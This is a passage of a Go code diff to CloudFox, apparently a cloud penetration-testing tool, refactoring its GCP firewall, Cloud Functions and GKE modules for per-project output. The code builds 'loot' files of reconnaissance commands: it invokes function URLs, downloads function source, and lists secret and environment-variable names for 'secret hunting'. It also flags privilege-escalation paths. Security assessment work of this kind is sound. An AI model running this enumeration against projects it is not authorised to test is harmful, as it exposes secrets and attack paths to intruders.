addFirewallRuleToLoot(projectID string, rule NetworkService.FirewallRuleInfo) { + lootFile := m.LootMap[projectID]["firewall-commands"] + if lootFile == nil { + return + } + + lootFile.Contents += fmt.Sprintf( "# Rule: %s (%s)\n"+ "# Project: %s\n"+ "gcloud compute firewall-rules describe %s --project=%s\n\n", @@ -221,36 +268,50 @@ func (m *FirewallModule) addFirewallRuleToLoot(rule NetworkService.FirewallRuleI // Output Generation // ------------------------------ func (m *FirewallModule) writeOutput(ctx context.Context, logger internal.Logger) { - // Firewall rules table - rulesHeader := []string{ - "Project Name", - "Project ID", - "Rule Name", - "Network", - "Direction", - "Priority", - "Source Ranges", - "Allowed", - "Targets", - "Disabled", - "Logging", - } - - var rulesBody [][]string - for _, rule := range m.FirewallRules { - // Format source ranges - no truncation + // Decide between hierarchical and flat output + if m.Hierarchy != nil && !m.FlatOutput { + m.writeHierarchicalOutput(ctx, logger) + } else { + m.writeFlatOutput(ctx, logger) + } +} + +// Table headers +func (m *FirewallModule) getRulesHeader() []string { + return []string{ + "Project Name", "Project ID", "Rule Name", "Network", "Direction", + "Priority", "Source Ranges", "Allowed", "Targets", "Disabled", "Logging", + } +} + +func (m *FirewallModule) getNetworksHeader() []string { + return []string{ + "Project Name", "Project ID", "Network Name", "Routing Mode", + "Subnets", "Peerings", "Auto Subnets", + } +} + +func (m *FirewallModule) getSubnetsHeader() []string { + return []string{ + "Project Name", "Project ID", "Network", "Subnet Name", + "Region", "CIDR Range", "Private Google Access", + } +} + +// rulesToTableBody converts rules to table body rows +func (m *FirewallModule) rulesToTableBody(rules []NetworkService.FirewallRuleInfo) [][]string { + var body [][]string + for _, rule := range rules { sources := strings.Join(rule.SourceRanges, ", ") if sources == "" { sources = "-" } - // Format allowed protocols - no truncation allowed := formatProtocols(rule.AllowedProtocols) if allowed == "" { allowed = "-" } - // Format targets - no truncation targets := "-" if len(rule.TargetTags) > 0 { targets = strings.Join(rule.TargetTags, ", ") @@ -260,7 +321,7 @@ func (m *FirewallModule) writeOutput(ctx context.Context, logger internal.Logger targets = "ALL" } - rulesBody = append(rulesBody, []string{ + body = append(body, []string{ m.GetProjectName(rule.ProjectID), rule.ProjectID, rule.Name, @@ -274,24 +335,15 @@ func (m *FirewallModule) writeOutput(ctx context.Context, logger internal.Logger boolToYesNo(rule.LoggingEnabled), }) } + return body +} - // Networks table - networksHeader := []string{ - "Project Name", - "Project ID", - "Network Name", - "Routing Mode", - "Subnets", - "Peerings", - "Auto Subnets", - } - - var networksBody [][]string - for _, network := range m.Networks { - // Count subnets +// networksToTableBody converts networks to table body rows +func (m *FirewallModule) networksToTableBody(networks []NetworkService.VPCInfo) [][]string { + var body [][]string + for _, network := range networks { subnetCount := len(network.Subnetworks) - // Format peerings - no truncation peerings := "-" if len(network.Peerings) > 0 { var peerNames []string @@ -301,7 +353,7 @@ func (m *FirewallModule) writeOutput(ctx context.Context, logger internal.Logger peerings = strings.Join(peerNames, ", ") } - networksBody = append(networksBody, []string{ + body = append(body, []string{ m.GetProjectName(network.ProjectID), network.ProjectID, network.Name, @@ -311,21 +363,14 @@ func (m *FirewallModule) writeOutput(ctx context.Context, logger internal.Logger boolToYesNo(network.AutoCreateSubnetworks), }) } + return body +} - // Subnets table - subnetsHeader := []string{ - "Project Name", - "Project ID", - "Network", - "Subnet Name", - "Region", - "CIDR Range", - "Private Google Access", - } - - var subnetsBody [][]string - for _, subnet := range m.Subnets { - subnetsBody = append(subnetsBody, []string{ +// subnetsToTableBody converts subnets to table body rows +func (m *FirewallModule) subnetsToTableBody(subnets []NetworkService.SubnetInfo) [][]string { + var body [][]string + for _, subnet := range subnets { + body = append(body, []string{ m.GetProjectName(subnet.ProjectID), subnet.ProjectID, subnet.Network, @@ -335,42 +380,116 @@ func (m *FirewallModule) writeOutput(ctx context.Context, logger internal.Logger boolToYesNo(subnet.PrivateIPGoogleAccess), }) } + return body +} - // Collect loot files - var lootFiles []internal.LootFile - for _, loot := range m.LootMap { - if loot.Contents != "" && !strings.HasSuffix(loot.Contents, "# Generated by CloudFox\n\n") { - lootFiles = append(lootFiles, *loot) - } - } - - // Build table files - tableFiles := []internal.TableFile{} +// buildTablesForProject builds all tables for given project data +func (m *FirewallModule) buildTablesForProject(networks []NetworkService.VPCInfo, subnets []NetworkService.SubnetInfo, rules []NetworkService.FirewallRuleInfo) []internal.TableFile { + var tableFiles []internal.TableFile + rulesBody := m.rulesToTableBody(rules) if len(rulesBody) > 0 { tableFiles = append(tableFiles, internal.TableFile{ Name: globals.GCP_FIREWALL_MODULE_NAME + "-rules", - Header: rulesHeader, + Header: m.getRulesHeader(), Body: rulesBody, }) } + networksBody := m.networksToTableBody(networks) if len(networksBody) > 0 { tableFiles = append(tableFiles, internal.TableFile{ Name: globals.GCP_FIREWALL_MODULE_NAME + "-networks", - Header: networksHeader, + Header: m.getNetworksHeader(), Body: networksBody, }) } + subnetsBody := m.subnetsToTableBody(subnets) if len(subnetsBody) > 0 { tableFiles = append(tableFiles, internal.TableFile{ Name: globals.GCP_FIREWALL_MODULE_NAME + "-subnets", - Header: subnetsHeader, + Header: m.getSubnetsHeader(), Body: subnetsBody, }) } + return tableFiles +} + +// writeHierarchicalOutput writes output to per-project directories +func (m *FirewallModule) writeHierarchicalOutput(ctx context.Context, logger internal.Logger) { + outputData := internal.HierarchicalOutputData{ + OrgLevelData: make(map[string]internal.CloudfoxOutput), + ProjectLevelData: make(map[string]internal.CloudfoxOutput), + } + + // Collect all projects with data + projectsWithData := make(map[string]bool) + for projectID := range m.ProjectNetworks { + projectsWithData[projectID] = true + } + for projectID := range m.ProjectSubnets { + projectsWithData[projectID] = true + } + for projectID := range m.ProjectFirewallRules { + projectsWithData[projectID] = true + } + + for projectID := range projectsWithData { + networks := m.ProjectNetworks[projectID] + subnets := m.ProjectSubnets[projectID] + rules := m.ProjectFirewallRules[projectID] + + tableFiles := m.buildTablesForProject(networks, subnets, rules) + + // Collect loot for this project + var lootFiles []internal.LootFile + if projectLoot, ok := m.LootMap[projectID]; ok { + for _, loot := range projectLoot { + if loot != nil && loot.Contents != "" && !strings.HasSuffix(loot.Contents, "# Generated by CloudFox\n\n") { + lootFiles = append(lootFiles, *loot) + } + } + } + + outputData.ProjectLevelData[projectID] = FirewallOutput{Table: tableFiles, Loot: lootFiles} + } + + pathBuilder := m.BuildPathBuilder() + + err := internal.HandleHierarchicalOutputSmart( + "gcp", + m.Format, + m.Verbosity, + m.WrapTable, + pathBuilder, + outputData, + ) + if err != nil { + logger.ErrorM(fmt.Sprintf("Error writing hierarchical output: %v", err), globals.GCP_FIREWALL_MODULE_NAME) + m.CommandCounter.Error++ + } +} + +// writeFlatOutput writes all output to a single directory (legacy mode) +func (m *FirewallModule) writeFlatOutput(ctx context.Context, logger internal.Logger) { + allNetworks := m.getAllNetworks() + allSubnets := m.getAllSubnets() + allRules := m.getAllFirewallRules() + + tableFiles := m.buildTablesForProject(allNetworks, allSubnets, allRules) + + // Collect all loot files + var lootFiles []internal.LootFile + for _, projectLoot := range m.LootMap { + for _, loot := range projectLoot { + if loot != nil && loot.Contents != "" && !strings.HasSuffix(loot.Contents, "# Generated by CloudFox\n\n") { + lootFiles = append(lootFiles, *loot) + } + } + } + output := FirewallOutput{ Table: tableFiles, Loot: lootFiles, diff --git a/gcp/commands/functions.go b/gcp/commands/functions.go index 51c2347e..7c99dd80 100644 --- a/gcp/commands/functions.go +++ b/gcp/commands/functions.go @@ -34,6 +34,10 @@ Security Columns: - VPCConnector: Network connectivity to VPC resources - Secrets: Count of secret environment variables and volumes +Resource IAM Columns: +- Resource Role: The IAM role granted ON this function (e.g., roles/cloudfunctions.invoker) +- Resource Principal: The principal (user/SA/group) who has that role on this function + Attack Surface: - Public HTTP functions may be directly exploitable - Functions with default service account may have excessive permissions @@ -48,9 +52,11 @@ Attack Surface: type FunctionsModule struct { gcpinternal.BaseGCPModule - Functions []FunctionsService.FunctionInfo - LootMap map[string]*internal.LootFile - mu sync.Mutex + // Module-specific fields - per-project for hierarchical output + ProjectFunctions map[string][]FunctionsService.FunctionInfo // projectID -> functions + LootMap map[string]map[string]*internal.LootFile // projectID -> loot files + PrivescCache *gcpinternal.PrivescCache // Cached privesc analysis results + mu sync.Mutex } // ------------------------------ @@ -74,12 +80,11 @@ func runGCPFunctionsCommand(cmd *cobra.Command, args []string) { } module := &FunctionsModule{ - BaseGCPModule: gcpinternal.NewBaseGCPModule(cmdCtx), - Functions: []FunctionsService.FunctionInfo{}, - LootMap: make(map[string]*internal.LootFile), + BaseGCPModule: gcpinternal.NewBaseGCPModule(cmdCtx), + ProjectFunctions: make(map[string][]FunctionsService.FunctionInfo), + LootMap: make(map[string]map[string]*internal.LootFile), } - module.initializeLootFiles() module.Execute(cmdCtx.Ctx, cmdCtx.Logger) } @@ -87,30 +92,44 @@ func runGCPFunctionsCommand(cmd *cobra.Command, args []string) { // Module Execution // ------------------------------ func (m *FunctionsModule) Execute(ctx context.Context, logger internal.Logger) { + // Get privesc cache from context (populated by --with-privesc flag or all-checks) + m.PrivescCache = gcpinternal.GetPrivescCacheFromContext(ctx) + m.RunProjectEnumeration(ctx, logger, m.ProjectIDs, globals.GCP_FUNCTIONS_MODULE_NAME, m.processProject) - if len(m.Functions) == 0 { + // Get all functions for stats + allFunctions := m.getAllFunctions() + if len(allFunctions) == 0 { logger.InfoM("No Cloud Functions found", globals.GCP_FUNCTIONS_MODULE_NAME) return } // Count public functions publicCount := 0 - for _, fn := range m.Functions { + for _, fn := range allFunctions { if fn.IsPublic { publicCount++ } } if publicCount > 0 { - logger.SuccessM(fmt.Sprintf("Found %d function(s), %d PUBLIC", len(m.Functions), publicCount), globals.GCP_FUNCTIONS_MODULE_NAME) + logger.SuccessM(fmt.Sprintf("Found %d function(s), %d PUBLIC", len(allFunctions), publicCount), globals.GCP_FUNCTIONS_MODULE_NAME) } else { - logger.SuccessM(fmt.Sprintf("Found %d function(s)", len(m.Functions)), globals.GCP_FUNCTIONS_MODULE_NAME) + logger.SuccessM(fmt.Sprintf("Found %d function(s)", len(allFunctions)), globals.GCP_FUNCTIONS_MODULE_NAME) } m.writeOutput(ctx, logger) } +// getAllFunctions returns all functions from all projects (for statistics) +func (m *FunctionsModule) getAllFunctions() []FunctionsService.FunctionInfo { + var all []FunctionsService.FunctionInfo + for _, functions := range m.ProjectFunctions { + all = append(all, functions...) + } + return all +} + // ------------------------------ // Project Processor // ------------------------------ @@ -128,11 +147,29 @@ func (m *FunctionsModule) processProject(ctx context.Context, projectID string, return } + // Thread-safe store per-project m.mu.Lock() - m.Functions = append(m.Functions, functions...) + m.ProjectFunctions[projectID] = functions + + // Initialize loot for this project + if m.LootMap[projectID] == nil { + m.LootMap[projectID] = make(map[string]*internal.LootFile) + m.LootMap[projectID]["functions-commands"] = &internal.LootFile{ + Name: "functions-commands", + Contents: "# GCP Cloud Functions Commands\n# Generated by CloudFox\n# WARNING: Only use with proper authorization\n\n", + } + m.LootMap[projectID]["functions-env-vars"] = &internal.LootFile{ + Name: "functions-env-vars", + Contents: "# Cloud Functions Environment Variables\n# Generated by CloudFox\n# Variable names that may hint at secrets\n\n", + } + m.LootMap[projectID]["functions-secrets"] = &internal.LootFile{ + Name: "functions-secrets", + Contents: "# Cloud Functions Secret References\n# Generated by CloudFox\n# Secrets used by functions (names only)\n\n", + } + } for _, fn := range functions { - m.addFunctionToLoot(fn) + m.addFunctionToLoot(projectID, fn) } m.mu.Unlock() @@ -144,24 +181,17 @@ func (m *FunctionsModule) processProject(ctx context.Context, projectID string, // ------------------------------ // Loot File Management // ------------------------------ -func (m *FunctionsModule) initializeLootFiles() { - m.LootMap["functions-commands"] = &internal.LootFile{ - Name: "functions-commands", - Contents: "# GCP Cloud Functions Commands\n# Generated by CloudFox\n# WARNING: Only use with proper authorization\n\n", - } - m.LootMap["functions-env-vars"] = &internal.LootFile{ - Name: "functions-env-vars", - Contents: "# Cloud Functions Environment Variables\n# Generated by CloudFox\n# Variable names that may hint at secrets\n\n", - } - m.LootMap["functions-secrets"] = &internal.LootFile{ - Name: "functions-secrets", - Contents: "# Cloud Functions Secret References\n# Generated by CloudFox\n# Secrets used by functions (names only)\n\n", +func (m *FunctionsModule) addFunctionToLoot(projectID string, fn FunctionsService.FunctionInfo) { + commandsLoot := m.LootMap[projectID]["functions-commands"] + envVarsLoot := m.LootMap[projectID]["functions-env-vars"] + secretsLoot := m.LootMap[projectID]["functions-secrets"] + + if commandsLoot == nil { + return } -} -func (m *FunctionsModule) addFunctionToLoot(fn FunctionsService.FunctionInfo) { // All commands for this function - m.LootMap["functions-commands"].Contents += fmt.Sprintf( + commandsLoot.Contents += fmt.Sprintf( "## Function: %s (Project: %s, Region: %s)\n"+ "# Runtime: %s, Trigger: %s\n"+ "# Service Account: %s\n"+ @@ -173,14 +203,14 @@ func (m *FunctionsModule) addFunctionToLoot(fn FunctionsService.FunctionInfo) { ) if fn.TriggerURL != "" { - m.LootMap["functions-commands"].Contents += fmt.Sprintf("# URL: %s\n", fn.TriggerURL) + commandsLoot.Contents += fmt.Sprintf("# URL: %s\n", fn.TriggerURL) } if fn.SourceLocation != "" { - m.LootMap["functions-commands"].Contents += fmt.Sprintf("# Source: %s (%s)\n", fn.SourceLocation, fn.SourceType) + commandsLoot.Contents += fmt.Sprintf("# Source: %s (%s)\n", fn.SourceLocation, fn.SourceType) } - m.LootMap["functions-commands"].Contents += fmt.Sprintf( + commandsLoot.Contents += fmt.Sprintf( "\n# Describe function:\n"+ "gcloud functions describe %s --region=%s --project=%s --gen2\n"+ "# Get IAM policy:\n"+ @@ -194,7 +224,7 @@ func (m *FunctionsModule) addFunctionToLoot(fn FunctionsService.FunctionInfo) { // HTTP invocation commands if fn.TriggerType == "HTTP" && fn.TriggerURL != "" { - m.LootMap["functions-commands"].Contents += fmt.Sprintf( + commandsLoot.Contents += fmt.Sprintf( "# Invoke (GET):\n"+ "curl -s '%s'\n"+ "# Invoke (POST with auth):\n"+ @@ -209,46 +239,46 @@ func (m *FunctionsModule) addFunctionToLoot(fn FunctionsService.FunctionInfo) { // Source download command if fn.SourceType == "GCS" && fn.SourceLocation != "" { - m.LootMap["functions-commands"].Contents += fmt.Sprintf( + commandsLoot.Contents += fmt.Sprintf( "# Download source:\n"+ "gsutil cp %s ./function-source-%s.zip\n", fn.SourceLocation, fn.Name, ) } - m.LootMap["functions-commands"].Contents += "\n" + commandsLoot.Contents += "\n" // Environment variable names (keep separate - useful for secret hunting) - if len(fn.EnvVarNames) > 0 { - m.LootMap["functions-env-vars"].Contents += fmt.Sprintf( + if len(fn.EnvVarNames) > 0 && envVarsLoot != nil { + envVarsLoot.Contents += fmt.Sprintf( "## Function: %s (Project: %s)\n", fn.Name, fn.ProjectID, ) for _, varName := range fn.EnvVarNames { - m.LootMap["functions-env-vars"].Contents += fmt.Sprintf("## - %s\n", varName) + envVarsLoot.Contents += fmt.Sprintf("## - %s\n", varName) } - m.LootMap["functions-env-vars"].Contents += "\n" + envVarsLoot.Contents += "\n" } // Secret references (keep separate - useful for secret hunting) - if len(fn.SecretEnvVarNames) > 0 || len(fn.SecretVolumeNames) > 0 { - m.LootMap["functions-secrets"].Contents += fmt.Sprintf( + if (len(fn.SecretEnvVarNames) > 0 || len(fn.SecretVolumeNames) > 0) && secretsLoot != nil { + secretsLoot.Contents += fmt.Sprintf( "## Function: %s (Project: %s)\n", fn.Name, fn.ProjectID, ) if len(fn.SecretEnvVarNames) > 0 { - m.LootMap["functions-secrets"].Contents += "## Secret Environment Variables:\n" + secretsLoot.Contents += "## Secret Environment Variables:\n" for _, secretName := range fn.SecretEnvVarNames { - m.LootMap["functions-secrets"].Contents += fmt.Sprintf("## - %s\n", secretName) + secretsLoot.Contents += fmt.Sprintf("## - %s\n", secretName) } } if len(fn.SecretVolumeNames) > 0 { - m.LootMap["functions-secrets"].Contents += "## Secret Volumes:\n" + secretsLoot.Contents += "## Secret Volumes:\n" for _, volName := range fn.SecretVolumeNames { - m.LootMap["functions-secrets"].Contents += fmt.Sprintf("## - %s\n", volName) + secretsLoot.Contents += fmt.Sprintf("## - %s\n", volName) } } - m.LootMap["functions-secrets"].Contents += "\n" + secretsLoot.Contents += "\n" } } @@ -256,8 +286,127 @@ func (m *FunctionsModule) addFunctionToLoot(fn FunctionsService.FunctionInfo) { // Output Generation // ------------------------------ func (m *FunctionsModule) writeOutput(ctx context.Context, logger internal.Logger) { - // Functions table with one row per IAM binding - header := []string{ + // Decide between hierarchical and flat output + if m.Hierarchy != nil && !m.FlatOutput { + m.writeHierarchicalOutput(ctx, logger) + } else { + m.writeFlatOutput(ctx, logger) + } +} + +// writeHierarchicalOutput writes output to per-project directories +func (m *FunctionsModule) writeHierarchicalOutput(ctx context.Context, logger internal.Logger) { + header := m.getTableHeader() + + // Build hierarchical output data + outputData := internal.HierarchicalOutputData{ + OrgLevelData: make(map[string]internal.CloudfoxOutput), + ProjectLevelData: make(map[string]internal.CloudfoxOutput), + } + + // Build project-level outputs + for projectID, functions := range m.ProjectFunctions { + body := m.functionsToTableBody(functions) + tables := []internal.TableFile{{ + Name: globals.GCP_FUNCTIONS_MODULE_NAME, + Header: header, + Body: body, + }} + + // Collect loot for this project + var lootFiles []internal.LootFile + if projectLoot, ok := m.LootMap[projectID]; ok { + for _, loot := range projectLoot { + if loot != nil && loot.Contents != "" && !isEmptyLootFile(loot.Contents) { + lootFiles = append(lootFiles, *loot) + } + } + } + + outputData.ProjectLevelData[projectID] = FunctionsOutput{Table: tables, Loot: lootFiles} + } + + // Create path builder using the module's hierarchy + pathBuilder := m.BuildPathBuilder() + + // Write using hierarchical output + err := internal.HandleHierarchicalOutputSmart( + "gcp", + m.Format, + m.Verbosity, + m.WrapTable, + pathBuilder, + outputData, + ) + if err != nil { + logger.ErrorM(fmt.Sprintf("Error writing hierarchical output: %v", err), globals.GCP_FUNCTIONS_MODULE_NAME) + m.CommandCounter.Error++ + } +} + +// writeFlatOutput writes all output to a single directory (legacy mode) +func (m *FunctionsModule) writeFlatOutput(ctx context.Context, logger internal.Logger) { + header := m.getTableHeader() + allFunctions := m.getAllFunctions() + body := m.functionsToTableBody(allFunctions) + + // Collect all loot files + var lootFiles []internal.LootFile + for _, projectLoot := range m.LootMap { + for _, loot := range projectLoot { + if loot != nil && loot.Contents != "" && !isEmptyLootFile(loot.Contents) { + lootFiles = append(lootFiles, *loot) + } + } + } + + tableFiles := []internal.TableFile{} + if len(body) > 0 { + tableFiles = append(tableFiles, internal.TableFile{ + Name: globals.GCP_FUNCTIONS_MODULE_NAME, + Header: header, + Body: body, + }) + } + + output := FunctionsOutput{ + Table: tableFiles, + Loot: lootFiles, + } + + scopeNames := make([]string, len(m.ProjectIDs)) + for i, id := range m.ProjectIDs { + scopeNames[i] = m.GetProjectName(id) + } + + err := internal.HandleOutputSmart( + "gcp", + m.Format, + m.OutputDirectory, + m.Verbosity, + m.WrapTable, + "project", + m.ProjectIDs, + scopeNames, + m.Account, + output, + ) + if err != nil { + logger.ErrorM(fmt.Sprintf("Error writing output: %v", err), globals.GCP_FUNCTIONS_MODULE_NAME) + m.CommandCounter.Error++ + } +} + +// isEmptyLootFile checks if a loot file contains only the header +func isEmptyLootFile(contents string) bool { + return strings.HasSuffix(contents, "# WARNING: Only use with proper authorization\n\n") || + strings.HasSuffix(contents, "# Variable names that may hint at secrets\n\n") || + strings.HasSuffix(contents, "# Secrets used by functions (names only)\n\n") +} + +// getTableHeader returns the functions table header +func (m *FunctionsModule) getTableHeader() []string { + return []string{ "Project Name", "Project ID", "Name", @@ -269,14 +418,18 @@ func (m *FunctionsModule) writeOutput(ctx context.Context, logger internal.Logge "Ingress", "Public", "Service Account", + "Priv Esc", "VPC Connector", "Secrets", - "IAM Role", - "IAM Member", + "Resource Role", + "Resource Principal", } +} +// functionsToTableBody converts functions to table body rows +func (m *FunctionsModule) functionsToTableBody(functions []FunctionsService.FunctionInfo) [][]string { var body [][]string - for _, fn := range m.Functions { + for _, fn := range functions { // Format trigger info triggerInfo := fn.TriggerType if fn.TriggerEventType != "" { @@ -308,6 +461,16 @@ func (m *FunctionsModule) writeOutput(ctx context.Context, logger internal.Logge serviceAccount = "-" } + // Check privesc for the service account + privEsc := "-" + if m.PrivescCache != nil && m.PrivescCache.IsPopulated() { + if serviceAccount != "-" { + privEsc = m.PrivescCache.GetPrivescSummary(serviceAccount) + } else { + privEsc = "No" + } + } + // If function has IAM bindings, create one row per binding if len(fn.IAMBindings) > 0 { for _, binding := range fn.IAMBindings { @@ -323,6 +486,7 @@ func (m *FunctionsModule) writeOutput(ctx context.Context, logger internal.Logge fn.IngressSettings, boolToYesNo(fn.IsPublic), serviceAccount, + privEsc, vpcConnector, secretsInfo, binding.Role, @@ -343,6 +507,7 @@ func (m *FunctionsModule) writeOutput(ctx context.Context, logger internal.Logge fn.IngressSettings, boolToYesNo(fn.IsPublic), serviceAccount, + privEsc, vpcConnector, secretsInfo, "-", @@ -350,49 +515,5 @@ func (m *FunctionsModule) writeOutput(ctx context.Context, logger internal.Logge }) } } - - // Collect loot files - var lootFiles []internal.LootFile - for _, loot := range m.LootMap { - if loot.Contents != "" && !strings.HasSuffix(loot.Contents, "# WARNING: Only use with proper authorization\n\n") { - lootFiles = append(lootFiles, *loot) - } - } - - // Build table files - tableFiles := []internal.TableFile{} - if len(body) > 0 { - tableFiles = append(tableFiles, internal.TableFile{ - Name: globals.GCP_FUNCTIONS_MODULE_NAME, - Header: header, - Body: body, - }) - } - - output := FunctionsOutput{ - Table: tableFiles, - Loot: lootFiles, - } - - scopeNames := make([]string, len(m.ProjectIDs)) - for i, id := range m.ProjectIDs { - scopeNames[i] = m.GetProjectName(id) - } - - err := internal.HandleOutputSmart( - "gcp", - m.Format, - m.OutputDirectory, - m.Verbosity, - m.WrapTable, - "project", - m.ProjectIDs, - scopeNames, - m.Account, - output, - ) - if err != nil { - logger.ErrorM(fmt.Sprintf("Error writing output: %v", err), globals.GCP_FUNCTIONS_MODULE_NAME) - m.CommandCounter.Error++ - } + return body } diff --git a/gcp/commands/gke.go b/gcp/commands/gke.go index ebeb5599..3464da6e 100644 --- a/gcp/commands/gke.go +++ b/gcp/commands/gke.go @@ -58,10 +58,12 @@ Attack Surface: type GKEModule struct { gcpinternal.BaseGCPModule - Clusters []GKEService.ClusterInfo - NodePools []GKEService.NodePoolInfo - LootMap map[string]*internal.LootFile - mu sync.Mutex + // Module-specific fields - per-project for hierarchical output + ProjectClusters map[string][]GKEService.ClusterInfo // projectID -> clusters + ProjectNodePools map[string][]GKEService.NodePoolInfo // projectID -> node pools + LootMap map[string]map[string]*internal.LootFile // projectID -> loot files + PrivescCache *gcpinternal.PrivescCache // Cached privesc analysis results + mu sync.Mutex } // ------------------------------ @@ -85,13 +87,12 @@ func runGCPGKECommand(cmd *cobra.Command, args []string) { } module := &GKEModule{ - BaseGCPModule: gcpinternal.NewBaseGCPModule(cmdCtx), - Clusters: []GKEService.ClusterInfo{}, - NodePools: []GKEService.NodePoolInfo{}, - LootMap: make(map[string]*internal.LootFile), + BaseGCPModule: gcpinternal.NewBaseGCPModule(cmdCtx), + ProjectClusters: make(map[string][]GKEService.ClusterInfo), + ProjectNodePools: make(map[string][]GKEService.NodePoolInfo), + LootMap: make(map[string]map[string]*internal.LootFile), } - module.initializeLootFiles() module.Execute(cmdCtx.Ctx, cmdCtx.Logger) } @@ -99,22 +100,28 @@ func runGCPGKECommand(cmd *cobra.Command, args []string) { // Module Execution // ------------------------------ func (m *GKEModule) Execute(ctx context.Context, logger internal.Logger) { + // Get privesc cache from context (populated by --with-privesc flag or all-checks) + m.PrivescCache = gcpinternal.GetPrivescCacheFromContext(ctx) + m.RunProjectEnumeration(ctx, logger, m.ProjectIDs, globals.GCP_GKE_MODULE_NAME, m.processProject) - if len(m.Clusters) == 0 { + // Get all clusters for stats + allClusters := m.getAllClusters() + allNodePools := m.getAllNodePools() + if len(allClusters) == 0 { logger.InfoM("No GKE clusters found", globals.GCP_GKE_MODULE_NAME) return } // Count public clusters publicCount := 0 - for _, cluster := range m.Clusters { + for _, cluster := range allClusters { if !cluster.PrivateCluster && !cluster.MasterAuthorizedOnly { publicCount++ } } - msg := fmt.Sprintf("Found %d cluster(s), %d node pool(s)", len(m.Clusters), len(m.NodePools)) + msg := fmt.Sprintf("Found %d cluster(s), %d node pool(s)", len(allClusters), len(allNodePools)) if publicCount > 0 { msg += fmt.Sprintf(" [%d with public API endpoint]", publicCount) } @@ -123,6 +130,24 @@ func (m *GKEModule) Execute(ctx context.Context, logger internal.Logger) { m.writeOutput(ctx, logger) } +// getAllClusters returns all clusters from all projects (for statistics) +func (m *GKEModule) getAllClusters() []GKEService.ClusterInfo { + var all []GKEService.ClusterInfo + for _, clusters := range m.ProjectClusters { + all = append(all, clusters...) + } + return all +} + +// getAllNodePools returns all node pools from all projects (for statistics) +func (m *GKEModule) getAllNodePools() []GKEService.NodePoolInfo { + var all []GKEService.NodePoolInfo + for _, nodePools := range m.ProjectNodePools { + all = append(all, nodePools...) + } + return all +} + // ------------------------------ // Project Processor // ------------------------------ @@ -140,12 +165,22 @@ func (m *GKEModule) processProject(ctx context.Context, projectID string, logger return } + // Thread-safe store per-project m.mu.Lock() - m.Clusters = append(m.Clusters, clusters...) - m.NodePools = append(m.NodePools, nodePools...) + m.ProjectClusters[projectID] = clusters + m.ProjectNodePools[projectID] = nodePools + + // Initialize loot for this project + if m.LootMap[projectID] == nil { + m.LootMap[projectID] = make(map[string]*internal.LootFile) + m.LootMap[projectID]["gke-commands"] = &internal.LootFile{ + Name: "gke-commands", + Contents: "# GKE Commands\n# Generated by CloudFox\n\n", + } + } for _, cluster := range clusters { - m.addClusterToLoot(cluster) + m.addClusterToLoot(projectID, cluster) } m.mu.Unlock() @@ -157,15 +192,13 @@ func (m *GKEModule) processProject(ctx context.Context, projectID string, logger // ------------------------------ // Loot File Management // ------------------------------ -func (m *GKEModule) initializeLootFiles() { - m.LootMap["gke-commands"] = &internal.LootFile{ - Name: "gke-commands", - Contents: "# GKE Commands\n# Generated by CloudFox\n\n", +func (m *GKEModule) addClusterToLoot(projectID string, cluster GKEService.ClusterInfo) { + lootFile := m.LootMap[projectID]["gke-commands"] + if lootFile == nil { + return } -} -func (m *GKEModule) addClusterToLoot(cluster GKEService.ClusterInfo) { - m.LootMap["gke-commands"].Contents += fmt.Sprintf( + lootFile.Contents += fmt.Sprintf( "# Cluster: %s (%s)\n"+ "# Project: %s\n"+ "gcloud container clusters describe %s --location=%s --project=%s\n"+ @@ -188,120 +221,183 @@ func (m *GKEModule) addClusterToLoot(cluster GKEService.ClusterInfo) { // Output Generation // ------------------------------ func (m *GKEModule) writeOutput(ctx context.Context, logger internal.Logger) { - // Clusters table - merged with config columns, removed Issues + // Decide between hierarchical and flat output + if m.Hierarchy != nil && !m.FlatOutput { + m.writeHierarchicalOutput(ctx, logger) + } else { + m.writeFlatOutput(ctx, logger) + } +} + +// writeHierarchicalOutput writes output to per-project directories +func (m *GKEModule) writeHierarchicalOutput(ctx context.Context, logger internal.Logger) { + // Build hierarchical output data + outputData := internal.HierarchicalOutputData{ + OrgLevelData: make(map[string]internal.CloudfoxOutput), + ProjectLevelData: make(map[string]internal.CloudfoxOutput), + } + + // Collect all project IDs that have data + projectsWithData := make(map[string]bool) + for projectID := range m.ProjectClusters { + projectsWithData[projectID] = true + } + + // Build project-level outputs + for projectID := range projectsWithData { + clusters := m.ProjectClusters[projectID] + nodePools := m.ProjectNodePools[projectID] + + tables := m.buildTablesForProject(clusters, nodePools) + + // Collect loot for this project + var lootFiles []internal.LootFile + if projectLoot, ok := m.LootMap[projectID]; ok { + for _, loot := range projectLoot { + if loot != nil && loot.Contents != "" && !strings.HasSuffix(loot.Contents, "# Generated by CloudFox\n\n") { + lootFiles = append(lootFiles, *loot) + } + } + } + + outputData.ProjectLevelData[projectID] = GKEOutput{Table: tables, Loot: lootFiles} + } + + // Create path builder using the module's hierarchy + pathBuilder := m.BuildPathBuilder() + + // Write using hierarchical output + err := internal.HandleHierarchicalOutputSmart( + "gcp", + m.Format, + m.Verbosity, + m.WrapTable, + pathBuilder, + outputData, + ) + if err != nil { + logger.ErrorM(fmt.Sprintf("Error writing hierarchical output: %v", err), globals.GCP_GKE_MODULE_NAME) + m.CommandCounter.Error++ + } +} + +// writeFlatOutput writes all output to a single directory (legacy mode) +func (m *GKEModule) writeFlatOutput(ctx context.Context, logger internal.Logger) { + allClusters := m.getAllClusters() + allNodePools := m.getAllNodePools() + + tables := m.buildTablesForProject(allClusters, allNodePools) + + // Collect all loot files + var lootFiles []internal.LootFile + for _, projectLoot := range m.LootMap { + for _, loot := range projectLoot { + if loot != nil && loot.Contents != "" && !strings.HasSuffix(loot.Contents, "# Generated by CloudFox\n\n") { + lootFiles = append(lootFiles, *loot) + } + } + } + + output := GKEOutput{ + Table: tables, + Loot: lootFiles, + } + + scopeNames := make([]string, len(m.ProjectIDs)) + for i, id := range m.ProjectIDs { + scopeNames[i] = m.GetProjectName(id) + } + + err := internal.HandleOutputSmart( + "gcp", + m.Format, + m.OutputDirectory, + m.Verbosity, + m.WrapTable, + "project", + m.ProjectIDs, + scopeNames, + m.Account, + output, + ) + if err != nil { + logger.ErrorM(fmt.Sprintf("Error writing output: %v", err), globals.GCP_GKE_MODULE_NAME) + m.CommandCounter.Error++ + } +} + +// buildTablesForProject builds all tables for given clusters and node pools +func (m *GKEModule) buildTablesForProject(clusters []GKEService.ClusterInfo, nodePools []GKEService.NodePoolInfo) []internal.TableFile { + tableFiles := []internal.TableFile{} + + // Clusters table clusterHeader := []string{ - "Project Name", - "Project ID", - "Name", - "Location", - "Endpoint", - "Status", - "Version", - 